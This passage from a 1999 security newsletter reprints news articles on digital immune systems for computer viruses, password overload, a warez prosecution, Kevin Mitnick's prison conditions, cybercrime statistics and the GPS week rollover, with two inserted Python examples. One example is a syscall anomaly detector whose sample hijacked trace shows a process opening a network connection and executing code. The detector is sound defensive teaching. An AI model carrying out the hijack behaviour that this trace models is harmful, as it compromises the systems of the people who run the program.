Although Melissa—the first virus to mail itself around the world—merely clogged E-mail systems, virus makers have already launched spin-offs of the virus designed to destroy data. The risk of computer infections rises as more information is exchanged through E-mail or over the Internet. Likewise, the potential damage that viruses can create multiplies as people send sensitive personal and corporate data over the Internet. Computer security experts also warn that the avenues for viruses to spread multiply dramatically as computers use software that's integrated so that one program can launch another. "There used to be plenty of time to analyze a virus before it spread, but Internet-borne viruses can spread around the world in hours or days," says Steve R. White of IBM's Thomas J. Watson Research Center in Yorktown Heights, N.Y. "In a world where things can travel this quickly and do this much damage, we have to have automated ways of dealing with them. It is silly to think that we can protect against these viruses manually." Computer viruses got their name from what White calls "an obvious but deep biological analogy." Like biological viruses, the computer versions replicate by attaching themselves to a host (a computer program rather than a human cell) and then co-opting the host's resources to make copies of themselves. Infection can lead to death: The computer crashes and all program information is irretrievably lost. Infection can also lead to sickness when the virus does not destroy any data but spreads and slows programs and communications. Even seemingly innocuous viruses may taint files and make the computer more likely to crash—like a long-lasting, low-grade infection. Companies spend several hundred million dollars annually on antivirus products and services, and they lose even more in downtime when they need to take their systems off-line to prevent viral infections from spreading. 
Because antivirus programs can only identify the viruses they already know, they aren't effective against the 10 to 15 new viruses created every day. Worst of all, says White, "many users of antivirus software blissfully continue to use antivirus software that is more than a year out of date." Aside from frequent updates, there are few ways of strengthening this system. Some antivirus programs can monitor a computer system for viruslike behavior, such as making a file bigger without adding new data, but such systems are prone to false alarms and virus makers can take steps to evade such detection systems. In the early 1990s, White and his colleagues at IBM dreamed of a digital immune system for computers (SN: 7/23/94, p. 63). For a model, they looked to the human immune system, which is constantly bombarded by infectious agents it has never before encountered and yet to which it generally responds quickly. Computer virus makers often reuse key parts of existing viruses in their new creations, White explains. An immune system should be able to identify previously unrecognized viruses by these short so-called genes, which often are critical to the viruses' function. Although conventional software might contain some of these genelike sequences, the presence of many is typically a sign of viral infection, White says. When a computer participating in a pilot test of this digital immune system finds virus genes or any other signs of infection, it strips out confidential data and encrypts the rest. The altered file then goes to a central computer facility at IBM to be analyzed. A computer there routes the virus to a test machine that lures the virus into replicating by running a variety of programs. If any of these decoy programs become infected, the test computer attempts to pull out a signature that can identify the virus in other computers. The signature and a prescription to strip the virus out of infected files is then sent back to the central computer. 
It adds the new virus to its database and sends the information on detection and treatment back to the infected computer. IBM's automated process typically takes less than 5 minutes to identify a virus signature and derive a prescription, the developers claim. Uninfected computers will also be "vaccinated," as the IBM team puts it, against infections with this new virus as soon as they check the updated database. Ultimately, White envisions, uninfected computers will be vaccinated automatically. Later this summer, IBM, in conjunction with a leading antivirus-program developer, Symantec Corp. in Cupertino, Calif., plans to release an antivirus plan that includes such a digital immune system. "This is the first step toward a comprehensive system that can spread a global cure for a virus faster than the virus itself can spread," White says. The IBM researchers are still trying to develop ways to mimic another trait of the immune system. An infected cell produces chemicals signaling distress, warning neighbor cells to put up barriers to slow the spread of the virus. Thus, when the immune system develops ways of attacking the intruder, it can quickly outpace the spread of the virus. The biological analogies of computer security may stretch even further than IBM's vision, says Stephanie Forrest of the University of New Mexico in Albuquerque. The human immune system identifies foreign invaders because they don't carry the body's typical flags of "self," not because they resemble other infectious agents. Forrest and her colleagues have found a way for a computer to identify self. By looking at short sequences of signals between a program and the computer's operating system, she and her colleagues have defined patterns unique to each machine. Abnormal patterns may be a sign of infection. For example, a program making unusual demands on system resources has very likely been co-opted by a virus or is being attacked by a hacker, says Forrest. 
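The self-profiling idea just described, as an added example (it is not Forrest's code and does not come from the article): record every short window of operating-system calls seen in known-good runs, then count the windows in a new trace that were never seen. The window length, the threshold, the call names and all traces are assumptions constructed for illustration; the example also shows a benign program update being flagged until the profile is relearned.

```python
"""Self/nonself detection over short sequences of OS calls (added illustration)."""

WINDOW = 3       # assumed window length; the article only says "short sequences"
THRESHOLD = 0.5  # assumed: flag a trace when half or more of its windows are foreign

# Constructed traces of a hypothetical file-copy utility (not real captures).
NORMAL_RUNS = [
    ["open", "read", "read", "close", "open", "write", "close", "exit"],
    ["open", "read", "close", "open", "write", "write", "close", "exit"],
]
# Same program: a run never seen as a whole, but built only from known windows.
UNSEEN_BUT_NORMAL = ["open", "read", "read", "close", "open",
                     "write", "write", "close", "exit"]
# Same program after foreign code took over in the middle of the run.
HIJACKED = ["open", "read", "read", "socket", "connect", "execve", "close", "exit"]
# Benign new release that switched from open to openat.
UPGRADED = ["openat", "read", "read", "close", "openat", "write", "close", "exit"]


def windows(trace, k=WINDOW):
    """Every contiguous run of k calls in the trace, in order."""
    return [tuple(trace[i:i + k]) for i in range(len(trace) - k + 1)]


def build_self(traces, k=WINDOW):
    """The 'self' profile: the set of all windows observed in known-good runs."""
    profile = set()
    for trace in traces:
        profile.update(windows(trace, k))
    return profile


def mismatches(trace, profile, k=WINDOW):
    """Windows of the trace that the profile has never seen ('nonself')."""
    return [w for w in windows(trace, k) if w not in profile]


def anomaly_rate(trace, profile, k=WINDOW):
    """Fraction of windows that are foreign; 0.0 if the trace is shorter than k."""
    total = len(windows(trace, k))
    return len(mismatches(trace, profile, k)) / total if total else 0.0


def is_anomalous(trace, profile, threshold=THRESHOLD, k=WINDOW):
    """True when the share of foreign windows reaches the threshold."""
    return anomaly_rate(trace, profile, k) >= threshold


def first_foreign_call(trace, profile, k=WINDOW):
    """(index, name) of the call that completes the first foreign window, or None."""
    for i, w in enumerate(windows(trace, k)):
        if w not in profile:
            return i + k - 1, trace[i + k - 1]
    return None


def learn(profile, trace, k=WINDOW):
    """Fold an approved trace into the profile so its behaviour becomes 'self'."""
    profile.update(windows(trace, k))


if __name__ == "__main__":
    profile = build_self(NORMAL_RUNS)
    for name, trace in [("unseen-but-normal", UNSEEN_BUT_NORMAL),
                        ("hijacked", HIJACKED),
                        ("upgraded", UPGRADED)]:
        print(f"{name:18} rate={anomaly_rate(trace, profile):.2f} "
              f"anomalous={is_anomalous(trace, profile)} "
              f"first={first_foreign_call(trace, profile)}")
    learn(profile, UPGRADED)  # an operator approved the new release
    print("upgraded after learn:", is_anomalous(UPGRADED, profile))
```

A trace shorter than one window scores 0.0, so very short-lived processes are a blind spot of this sketch, and whatever is passed to `learn` becomes trusted from then on.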
"We've shown pretty convincingly that looking at these short sequences of self gives good discrimination between what is self and what isn't," she says. Such a system can be very efficient, Forrest points out. The protected computer uses its resources to check only programs and files that it is using. She and her colleagues have also shown that information packets flowing into and out of a network of computers hooked to the Internet show patterns recognizable as self or nonself. Like white blood cells in the human body, a digital immune system can create antibodies that recognize foreign material, Forrest says. To minimize the chances that the antivirus program will attack the computer itself, it would always destroy antibodies that flag patterns that are intrinsic to the computer. Using the remaining digital antibodies, the system will periodically check for abnormal patterns that may signify virus infections or intrusions from hackers. Forrest and her colleagues are working on a system that will allow a computer to continually learn to redefine itself, so the computer can accept new programs without flagging them as viruses. The researchers have not yet explored how to attack viruses once identified. Forrest says that a self-recognizing system will be practical even for individual computers connected to the Internet and used primarily for E-mail, writing, designing graphic presentations, and perhaps a little programming. Though still theoretical, Forrest's approach may offer many advantages. A different immune system would run on every computer. Since every computer would create different antibodies, a virus that evaded one computer might not escape detection by another, limiting the spread of the virus. Likewise, a person who broke into one computer network and managed to avoid detection by that system might not be so successful on another network, she says. "They've taken a much more exact analogy with biology by developing digital antibodies," says White. 
"But the analogy breaks down. All of my cells come from me, so my immune system can define self. But I put files on my computer every day.... This system may be very good for intrusion detection, but it may not be a good approach for viruses, because it will make too many mistakes. Our approach is more specific for viruses." Both research groups caution that in nature, no defense system remains perfect forever. Just as white blood cells and viruses engage in a delicate dance, each evolving to outwit the other, so will computer viruses and antivirus technology, White says. Viruses are getting more dangerous all the time, he says. Several programs for automating the development of macro viruses are circulating, meaning that the virus-writing community can create viruses faster than ever. There are even some indications that viruses may be evolving on their own, White says. For example, some versions of Microsoft Word may make minor errors when copying viruses. These changes may disable the virus, or they may make the virus harder to spot. Also, if two or more viruses successfully infect a computer, one may accidentally copy itself into the other virus, creating a new kind of bug, he says. While uncommon so far, these scenarios are certainly threatening, White notes. Whatever the form of the threat, the goal of protecting computer systems remains. "What we would ideally like is for a computer to behave the way the human body does," says Sushil Jajodia of George Mason University in Fairfax, Va. "When we are attacked by a virus, we get sick, but the immune system detects the virus, defeats it, and heals the damage. Computer systems are not like the human body, though, in that we need to provide the technology." Because programs and operating systems are not usually designed with security in mind, antiviral programs will always be behind the curve, says Jajodia. 
"It still isn't clear how well this idea [of digital immune systems] will work, but we have no better alternative for detecting virus infections," he says. Computer users have demanded ease of use but not security, says Forrest. "While people are becoming aware of the issues...they don't feel personally threatened yet." She notes that "when the Internet took off in the early '90s, it became evident that the computer-security problem was going to become everybody's problem." Jajodia, editor-in-chief of the Journal of Computer Security, says that programmers should address the problem of viruses long before people begin using newly developed software. Designing computer systems and programs with security in mind is an important first step, he says. More programs should check digital signatures to confirm that transferred files and computer code come from a trusted source. Better encryption systems, which help ensure that information has not been altered in transit from one computer to another, would make it harder for people to design viruses and for viruses to spread, he says. Computer-security experts warn that no single set of changes will be enough to completely protect increasingly interconnected computer systems. They hope, however, that new security measures, such as digital immune systems, will fend off future epidemics. Computer viruses: Then and now The first computer virus, called Brain, appeared in 1987. The people who created the first viruses hitched them to operating systems (such as DOS) or to applications (such as games or editing programs). Some of these viruses are still circulating. With these viruses, when a user turns on an infected computer or runs an infected program, the viral code copies itself into the computer's memory—and from there into any subsequent applications the user runs. These viruses spread only when a computer user shares tainted files and programs with other people. 
On the other hand, viruses like Melissa latch onto macros, small programs hidden in word processing software. For example, when an unsuspecting recipient of the Melissa virus opened an infected document written in Microsoft Word, the virus activated and hijacked another program known as Microsoft Outlook. This program E-mailed copies of the infected document to the first 50 people listed in the program's address directory. The virus spread so quickly because so many people use both Word and Outlook.

Until macros became commonplace, viruses couldn't infect data files, including word processing documents and spreadsheets. Macro viruses proliferate rapidly because many people share data files freely, and they do so primarily through E-mail. Once one data file is infected, a virus can infect all other data files of that application as soon as they are opened.

By the end of 1998, programmers and users had identified more than 30,000 viruses. Viruses of all sorts now affect millions of computers every year.

From Science News, Vol. 156, No. 5, July 31, 1999, p. 76.
Copyright © 1999, Science Service.

@HWA

46.0 Forgot your password? Try 'way2many'
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.nytimes.com/library/tech/99/08/circuits/articles/05pass.html

August 5, 1999

Forgot a Password? Try 'Way2Many'

Better Online Security Has Meant More Passwords, and More Frustrated Users

By JENNIFER 8. LEE

A few months ago, Kevin McGuire, a computer consultant in Lombard, Ill., designed a new computer system for a client. After a break from the project, he sat down at the computer to start up the system but couldn't get into the server. He had forgotten his password.

A sense of panic gripped him as he rapidly typed in variations on his favorite passwords. Two days later he gave up and rebuilt the system from scratch.

Not everything can be recreated, though.
Also lost in password purgatory is a year's worth of personal journal entries he kept in a Microsoft Word document on his personal computer.

"I wanted the password to be different so that people wouldn't be able to get to my journal," McGuire said. "Unfortunately, neither can I."

It is understandable that McGuire would drop a password or two. On a regular basis, he must remember three dozen passwords to gain access to computer networks, software programs, e-mail, voice mail, fax mail, Web sites, ATM's and even the security system for his house.

Forgotten passwords are an inevitable consequence of the digitization of everything from money to mail. Twenty years ago, people had to remember only their Social Security number and maybe a phone number or two. But since the introduction of the automated teller machine, people have accumulated an arsenal of passwords, access codes and personal identification numbers to use everything from answering machines to office bathrooms. A result is lost computer files, inaccessible accounts and a lot of banged-up keyboards.

"What is nightmarish is that we rely so much on information that comes from different sources," said Alessandro Piol, a managing director of Investco Private Capital in New York, who has been locked out of his e-mail account while conducting coast-to-coast venture capital negotiations. "If you are locked out of a system, it's like losing a limb."

The exponential growth of Web sites creates an exponential growth in forgotten passwords. Almost all password-protected sites either encourage people who have forgotten their passwords to reregister or provide a mechanism where they can automatically retrieve their password. The New York Times on the Web site estimates that more than 1,000 people forget their password to the site each week, and 10 to 15 percent of its registrants are duplicates.

Of course, many computer users simply do what computer security experts warn them not to: use the same password for everything.
But even that strategy is becoming more difficult because various computer systems have different requirements for the rendering and length of the passwords.

Ron Dilley is an extreme example of the password problem. Dilley, a network administrator for Applied Digital Access in the San Diego area, maintains 129 active passwords, 37 personal ones and 92 for work. He sees himself as the archetypal wired citizen of the future.

"I suspect that we will be totally inundated with passwords of one form or another in the next 10 to 20 years and possessing 129 passwords will be the norm," he said.

Dilley began to use a Palm organizer to track his passwords. Every few weeks, he forgets to take his Palm when he leaves home and makes a 50-minute round-trip back home to pick it up.

Forgotten passwords cost millions of dollars annually in help-desk costs and lost productivity -- incidents like McGuire's rebuilding of the computer system from scratch. Industry estimates say 20 percent to 50 percent of all calls to company help desks are from people needing their passwords reset. According to the Gartner Group, an organization with 2,500 desktop computers can spend more than $850,000 a year resetting passwords.

The requests for password help "are considered to be noise and nuisance by help-desk staff, because they are so highly repetitive," said John Jacobs, president of Network Support Technologies, a company in Burlington, Mass., that provides help-desk services.

Forgotten passwords are a product of the computer's ability to store more information than the human brain can.

"In the old days you just had to yell out, 'Zog, it's me,' and he would let you into the cave without clubbing you," said Prof. Irving Biederman, a cognitive neuroscientist at the University of Southern California. "Now you need all these passwords to get access anywhere."

Research confirms the intuitive: the more we are asked to remember, the more likely we are to forget.
The brain's capacity for remembering is indefinite as long as it has associations for the memories.

"The design of human memory and the design of computer architecture is at a crossroads," said Steve Pinker, a cognitive neuroscientist at the Massachusetts Institute of Technology. "A computer password must be arbitrary enough that people can't guess it, but human memory is designed to remember things that are not arbitrary."

Whereas short-term memory usually holds between five and nine items, scientists say there are no limits on long-term memory capacity -- as long as people have associations for those memories. That is why people have a natural impulse to choose passwords based on familiar things -- children's birthdays, spouse's name, favorite sports team -- rather than incomprehensible strings like 3B#$Ir or 7*$3fg.

According to Dr. Pinker, there is no neurological reason that given strong enough associations, people shouldn't be able to recall 129 passwords, "like you can remember an indefinite number of names of friends."

A nuisance for computer users is also a growing expense for companies.

The rampant growth of passwords has spawned various strategies for handling scattered bits of information. Some people keep lists of passwords taped to walls or to the underside of their keyboards, much to network administrators' dismay. Others keep lists in small notebooks or in files stored on their computers.

Some high-security institutions like financial companies and hospitals assign passwords instead of letting users choose, or force users to change their passwords every 30 or 60 days, which results in periodic spikes in reset calls to technical support staffs.

Resetting of passwords has become so costly to companies that some are choosing to automate the process. Password reset software eliminates the need for harried users to depend on help desks by allowing them to maintain their own user profiles.
Merrill Lynch and Boeing both recently purchased such systems from the Courion Corporation.

Michael J. Koszenski, a computer technician in Lexington, spent 2,000 hours of his own time creating a password database software for his PC after being disappointed with various password tracking programs.

"It basically goes back to if you want something done right, you have to do it yourself," said Koszenski, who has 30 or so passwords and access codes to manage. For protecting his password program, there is yet another password that he keeps in his head.

The proliferation of passwords and the propensity to lose them has helped fuel a cottage industry of companies and consultants who recover passwords using computer programs. While most password recovery requests come from people who are trying to retrieve passwords of dead relatives or disgruntled former employees, recovery businesses estimate that between 15 percent and 25 percent of requests come from people who have forgotten their own passwords on documents.

Tax time is a popular time for people to forget passwords, particularly those on old financial files. So, too, are the holidays.

"For about a week after New Year's people call up saying, 'I got drunk over the holidays, I changed my password on a whim and I can't remember it,'" said Amber Schroader, general manager of Access Data in Provo, Utah, which sells about 600 password recovery software packages a month.

Among the most common requests are those involving passwords for documents created with Microsoft Word or Excel, which are easy for the companies to recover because those programs do not have strong encryption.

The majority of popular software applications produced in the United States and distributed internationally have intentionally weak encryption since this country has strict controls on the export of encryption tools and products, said Bob Weiss, president of Password Crackers, a Web-based password recovery consulting firm.
"People are surprised by how many software products listed on our site are not secure," he said. There are some emerging high-tech solutions to the password deluge. Biometric devices that recognize fingerprints, faces and voices, and smart cards that are embedded with computer chips are gaining in popularity. Matchbox-size fingerprint recognition devices for the PC are now available for as low as $99. So-called smart cards, which carry digital signatures and are used for phone calls and purchases, are growing at a rate of 30 percent a year, predominantly in Europe. Piol, the venture capitalist, once taped a piece of paper listing his passwords on the wall by his desk, but a few months ago he started using a fingerprint scanner, U.are.U, to help manage the passwords. Impressed by the device, Piol tore down the paper and led a $9 million dollar venture capital investment in the company, Digital Persona. But until fingerprint scanners and smart card readers become as standard on desktops as computer mice, people will still have to struggle with the chore of password management. The University of Michigan is teaching its students a hygienic, low-tech approach to the problem. Treat passwords like underwear, the university says: Never let friends borrow them and never leave them lying about. And as anybody's mother would say, change them often. @HWA 47.0 A Former Network Administrator Faces Felony Charges in Hacker-Site Case ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://chronicle.com/cgi2-bin/printable.cgi A Former Network Administrator Faces Felony Charges in Hacker-Site Case By FLORENCE OLSEN A 25-year-old former computer-network administrator for the University of Oklahoma faces criminal charges under the state's Computer Crimes Act after allegedly using the university network to operate a site for hackers. which heavy use mysteriously disabled the campus network just as upperclassmen were arriving for the fall term. 
Authorities are investigating whether others were involved.

The heavy usage had the effect of reducing the capacity of the campus backbone from "a 12-inch-diameter pipe to one no bigger than a stir straw," says Lieut. Jeffrey Harp, a public-safety officer at the university.

At the time, university officials seized more than a half-dozen unauthorized Internet servers operating in two rooms assigned to residence-hall advisers in Walker Center, a 12-story dormitory on the university's campus, in Norman.

The Daily Oklahoman reported that Mr. Breding is suspected of operating a "warez" site (pronounced "wares"), where members of the Internet underground copied and exchanged pirated commercial software after hackers had cracked the files' copyright-protection codes.

Campus police say they seized one computer that the former network administrator allegedly had set up for a commercial purpose -- serving as host for others' Web pages.

If convicted, Mr. Breding could be punished with up to a 10-year prison sentence and a fine of as much as $100,000. A hearing is set for August 17.

University police spent 11 months and $20,000 on equipment, training, and consulting services to investigate the incident before turning the case over to the district attorney's office.

"It was an eye-opening case for us," Mr. Harp says. "It taught us that we needed to get up to speed on investigating computer crime," he says, and in turn led department detectives to seek further training and certification as forensic computer investigators. "It was our first case like this, and we're trying to prepare ourselves for the next one."

Mr. Breding was charged under the state's Computer Crimes Act, passed in 1984 and updated several times since. The act makes it a felony to knowingly or willfully exceed one's authorized use of computer-network resources or to disrupt those services to others.
Tera Duke, the assistant district attorney, says it is the first such case filed under that statute in Cleveland County District Court, in Norman. Ms. Duke says she is unaware of any pending federal charges related to the case.

@HWA

48.0 Happy Birthday Kevin
     ~~~~~~~~~~~~~~~~~~~~

From http://www.antionline.com/s

Mitnick's Life - As It Stands Now
Monday, August 2, 1999 at 1:20:04
by Kimberly Tracey - Writing For AntiOnline

For a few years I was talking to Kevin almost every day and sometimes several times a day. Right now my work prevents me from being in touch with him every day, but I know people who are in contact with him, so I stay current. Here's a little bit about Kevin's life at MDC:

At MDC there is no yard for exercising. They have no place to exercise outside where they can sit in the sun. Whenever the guards call a "lockup," the inmates are rounded up and taken to a very large balcony outside. If you want to use a bathroom, you go to the one in your cell. When Kevin was sleeping on the floor, he had to use the toilets of other inmates.

There are two TV's on Kevin's floor. The last time I heard, one TV was controlled by the blacks, and the other was controlled by the Hispanics. These two groups decide what everyone will watch. A white Jewish guy like Kevin doesn't have much of a say in the programming.

There are vending machines on the floors, and there is at least one microwave oven. When the food is lousy, which is most of the time, inmates buy food from the guards or from someone in the kitchen and prepare meals and share them with each other. That is why Kevin accumulated cans of tuna and Pepsi a couple of years ago because these items are very important when you have nothing else to eat. And the tuna is that brown low-grade smelly stuff that I hate....no white albacore tuna at MDC!

MDC brought in a couple of exercise bikes and they were broken almost immediately. I'm not sure what Kevin uses to exercise now. They may have gotten some new equipment.
When he said he just finished a "workout," that could have been pushups, situps, and lifting some weights, if they have them. They might consider weights potential weapons, I don't know.

Whenever any of us send Kevin money, it is put into his account and he is given a receipt telling him the amount. And unless they have changed the system, he doesn't know who sent him the money. And if you send him a personal check or a money order from the bank, the money is held up for weeks before it is placed into his account. If you send him a money order which you can buy from the Post Office, that money is placed into his account immediately. Therefore, if you are near the Post Office and want to help Kevin, pick up a Postal Money Order and send it to him with a note telling him that you included a MO for $10 or whatever the amount was. Then regardless of whether MDC informs him where the money came from, he will know directly from you what was sent, and he will appreciate it very much.

Whatever money Kevin receives is spent on stamps, envelopes, paper, shaving and bath items like soap and toothpaste, vitamins, tennis shoes, plain white Hanes t-shirts, etc.

When Kevin makes calls, he goes to one of the three phones on the floor and leans against the wall as he places his collect calls. He is only allowed to call collect, and Pac Bell charges around $2.00 for every call accepted by the party he is calling plus the minute rate. Each call is limited to 20 minutes. The computerized operator breaks in at 19 minutes and tells you that there is one minute remaining, and then 15 seconds and you are cut off exactly at the 20 min point. If Kevin is lucky, he finds a stool he can sit on while he is talking.

Usually, each morning inmates sign up for phone time. If you have a few extra dollars, you are able to buy someone's phone time. MDC doesn't like this practice, but they all do it and most of the time the guards leave you alone.
On this floor where Kevin resides, phones are shut off at 9:45 p.m. They are turned back on around 7 or 8 a.m.

During the day inmates roam around in one big "general area." Many play cards. There is at least one ping-pong table because you can hear the ball being hit back and forth in the background. Inmates can sign up for library time. Kevin is still being allowed to work on his computer during the day, no weekends.

Kevin and others can buy cheap Sony Walkmans from the prison commissary. They can play the radios, but they are not allowed CD or tape players. Kevin's attorney, Donald Randolph, can bring these items to the "attorney room" and Kevin can listen to tapes and view a video if he is with his attorney. So don't send Kevin tapes or CD's unless you send them directly to his attorney. And then they may never reach Kevin because he is working on his case when his defense team visits him.

Pretty grim, right? Your letters, cards, jokes, magazines, and different items you send Kevin break the monotonous schedule he faces every day. He may not have the time to write back to every person who writes to him, but he reads everything and tells his friends and family how much the news from the outside world means to him. And Kerry and Emmanuel and the rest of the people who hear from Kevin will tell you that he appreciates the support from this mailing list and those who visit his site and inform the world about him and his case.

BTW: Kevin's birthday is August 6th. If you would like to send him a card or gift, you can mail it to:

Kevin Mitnick 89950-012
P.O. Box 1500
Los Angeles, CA 90053

@HWA

49.0 Cybercrime up 43%
     ~~~~~~~~~~~~~~~~~~

http://www.zdnet.com/filters/printerfriendly/0,6061,2310082-2,00.html

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Study: Cybercrime cases up 43 percent

By Kevin Poulsen, ZDNN
August 5, 1999 3:54 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310082,00.html?chkpt=hpqs014

Federal law enforcement agencies referred a record number of computer crime cases for prosecution last year, but most of them were rejected by government attorneys, according to a legal journal report released Wednesday.

The report, authored by attorney and electronic privacy advocate David Banisar, and based on data obtained under the Freedom of Information Act by the Transactional Records Access Clearinghouse, appears in this week's Criminal Justice Weekly. It's believed to be the first independent analysis of the government's war on computer crime.

In all, investigators from the FBI and other agencies offered 419 computer crime cases to federal prosecutors in 1998, up 43 percent from 1997, and more than three times as many as in 1992. At the same time, prosecutors filed charges in only 83 cases.

That ratio of referrals to prosecutions, approximately 5 to 1, is significantly lower than the overall rate for federal prosecutions in all categories. In 1998, Banisar said, there were 132,772 referrals at the federal level, and 82,071 prosecutions, or about one prosecution for every 1.6 referrals.

FBI: Hard to prove

"Computer crime is terribly hard to prove," says FBI spokesperson Debbie Weierman. "Every one is handled on a case by case basis, and I can't give you a general reason for the difference in figures."

According to the report, each year between 1992 and 1998, the Department of Justice has declined to prosecute between 64 percent and 78 percent of the cases brought to them. Forty percent of the rejected cases cited lack of evidence of criminal intent, weak or insufficient admissible evidence, or no evident federal offense. Another 15 percent were referred to state authorities for prosecution.
The remaining cases may be outstanding, or reclassified under another category.

A former assistant United States attorney said he is not surprised by the results, and that in many ways computer crime cases are unique.

"There are serious evidentiary questions and jurisdictional questions in these cases," says Mark Rasch, a former computer crime prosecutor, now working as a computer security consultant for Global Integrity, based in Virginia. "Law enforcement may be presenting you with a perfectly good case, against a defendant in Kuala Lumpur."

Moreover, he said, "Juveniles are frequently the ones that get caught. So while the FBI may be able to put together a perfectly cohesive case against a juvenile, that's the kind of case that may be declined by the United States Attorney's office by their discretion."

Unique challenges

Justice officials hadn't reviewed the statistics, but agreed that there are unique challenges to prosecuting computer crime.

In 1998, the average sentence for those convicted was five months, with over half of the defendants receiving no jail time. Since 1992, 196 people have been convicted and 84 imprisoned in cases classified as federal computer crimes.

Only 57 cases reached disposition last year, 47 ending in convictions, primarily in plea agreements, and 10 ending with the status of "not successful" -- a category that includes dismissals and not-guilty verdicts.

Of the cases that ended in 1998, the FBI initiated the most, with 21 convictions, and eight unsuccessful prosecutions. The Secret Service, Treasury Department and IRS claim the remaining 28 convictions and two failed prosecutions, says Banisar, a columnist for the legal journal, and co-author of The Electronic Privacy Papers.

Because referrals can take years to become prosecutions, direct correlation from year to year is a tricky matter, Banisar cautioned. But he said the overall statistics are telling.
"For an issue that the federal government is making such a major deal out of, trying to stop computer crime and information warfare, there's remarkably few prosecutions," he said. Kevin Poulsen writes a weekly column for ZDTV's CyberCrime. @HWA 50.0 Canada Can't Keep Up With CyberCrime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond An intelligence brief prepared by the RCMP says that the Canadian police lack the necessary skills and personnel to protect the nations infrastructure from infocriminals and cyber terrorists. Ottawa Citizen http://www.ottawacitizen.com/national/990805/2686261.html Police can't handle cyber threats: RCMP report Mounties say Canada is 'lagging behind' in creation of hacker-defence systems Jim Bronskill The Ottawa Citizen The RCMP say Canadian police lack the necessary skills and personnel to meet the growing threat to national security from computer hackers. Canada is "lagging behind" other advanced countries in building defences to protect communication, power, water and banking systems, warns an intelligence brief prepared by the force in mid-June. "There is a general lack of awareness about the nature and level of threat posed to national security by cyber attacks and the level of defence and response that would be required," says the brief, obtained under the Access to Information Act. "Several government departments dealing with an increasing number of sophisticated attacks are seeking guidance, support and assistance from law enforcement, only to find there is a lack of skilled and trained resources." The assessment is the latest in a string of warnings sounded by Canadian security agencies about the vulnerability of the country's information networks. A special Senate committee and the Canadian Security Intelligence Service have also underscored the threat to digital networks and data banks from hackers, electronic spies and cyber-terrorists. 
The RCMP noted an increase during the last year in the number of computer break-ins, data thefts and system disruptions, a trend that does not bode well.

"The likelihood of a serious, deliberate and targeted attack to a Canadian critical-infrastructure system has increased from low to medium, and the impact of such an attack remains high," says the RCMP brief.

"In the last five years, the capability to intrude into systems has increased dramatically as the cost of technology has plummeted."

On the Internet, there are Web sites, electronic bulletin board services and chat rooms dedicated to discussing and trading hacking tools and methods. A group known as H4G1S claimed responsibility for breaking into and altering 13 major U.S. and Canadian corporate Web sites in April, notes the RCMP document.

A more serious attack could have the cascading effect of the January 1998 ice storm that denied electrical power to parts of Eastern Canada.

The brief's worrisome tone does not surprise Andrew Mackie, director of Manitoba's fledgling information protection centre. "We are way behind the other countries," he insisted.

Mr. Mackie said the United States, Australia, Britain and other European countries have moved more quickly than Canada to set up national centres to detect and prevent attacks. "We don't even have a plan right now. We're just working on it."

RCMP Sgt. Andre Guertin said the force sees a rising threat to Canadian systems in the immediate future because of the heightened potential for sabotage due to the millennium computer bug.

The force has established Project Solstice to ensure governments and businesses are aware that terrorists could take advantage of the computer glitch. For instance, a company might be tempted to waive security screening in the rush to hire a repair crew to make systems Y2K compliant.

The RCMP have been assisting the U.S.
Federal Bureau of Investigation on computer-crime cases, but the memo notes "difficulties encountered with Canadian collaboration and investigative support" in international probes, raising issues of co-ordination, resources and sovereignty.

Mr. Guertin said some of these questions were broached when U.S. and Canadian officials met in Charlottetown in June to discuss cross-border crime.

@HWA

51.0 Germans hold bank liable for using 56 bit encryption.
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

A German court recently decided to hold a bank liable for losses in connection with a stolen Eurocheque card in part because the 56-bit encryption protecting the card was considered "out-of-date and not safe enough." Are you still relying on DES to keep your data secure?

Asian Technology Information Program - Paragraph 13
http://www.atip.or.jp/public/atip.reports.98/atip98.096.html

52.0 GPS Date Rollover on Aug 22
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by ph1b3r_m0nk

On Aug. 22nd the GPS (Global Positioning System) Rollover is scheduled to occur. This rollover happens every 1,024 weeks but this will be the first rollover since the system went online on Jan. 6th 1980. On Aug. 22nd the date counter will return to zero to begin the count for the next 1,024 weeks. GPS is utilized within many industries such as Satellite tracking, Defense Information, Navigation and Geographic Information Systems (GIS). Some early GPS units did not take this date rollover into account and may be affected. (hhhmmmm, I suppose we ought to postpone that hiking trip.)
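The 1,024-week rollover described above, as an added example (not from HNN or from any receiver vendor): the week number is modelled as a 10-bit counter, so a receiver that adds it straight to the 1980 epoch reads Aug. 22, 1999 as Jan. 6, 1980. The `not_before` pivot (for instance a firmware build date) is one assumed mitigation, all function names are hypothetical, and times are GPS time with leap seconds ignored.

```python
from datetime import datetime, timedelta

GPS_EPOCH = datetime(1980, 1, 6)   # week 0 begins here (GPS time)
WEEKS_PER_CYCLE = 1024             # 10-bit week counter: values 0..1023


def full_week(when):
    """Number of whole weeks elapsed since the GPS epoch."""
    return (when - GPS_EPOCH).days // 7


def broadcast_week(when):
    """What the 10-bit counter actually carries: the week modulo 1,024."""
    return full_week(when) % WEEKS_PER_CYCLE


def naive_decode(week10, seconds_of_week=0):
    """Failure mode: treat the 10-bit value as the absolute week number."""
    return GPS_EPOCH + timedelta(weeks=week10, seconds=seconds_of_week)


def pivot_decode(week10, not_before, seconds_of_week=0):
    """Pick the 1,024-week cycle that puts the date on or after `not_before`.

    Assumed mitigation: `not_before` is a date the unit knows is in the
    past. The result is only unambiguous for 1,024 weeks after that pivot.
    """
    floor_week = full_week(not_before)
    week = (floor_week // WEEKS_PER_CYCLE) * WEEKS_PER_CYCLE + week10
    if week < floor_week:          # counter has wrapped since the pivot
        week += WEEKS_PER_CYCLE
    return GPS_EPOCH + timedelta(weeks=week, seconds=seconds_of_week)


if __name__ == "__main__":
    build_date = datetime(1995, 1, 1)      # constructed pivot value
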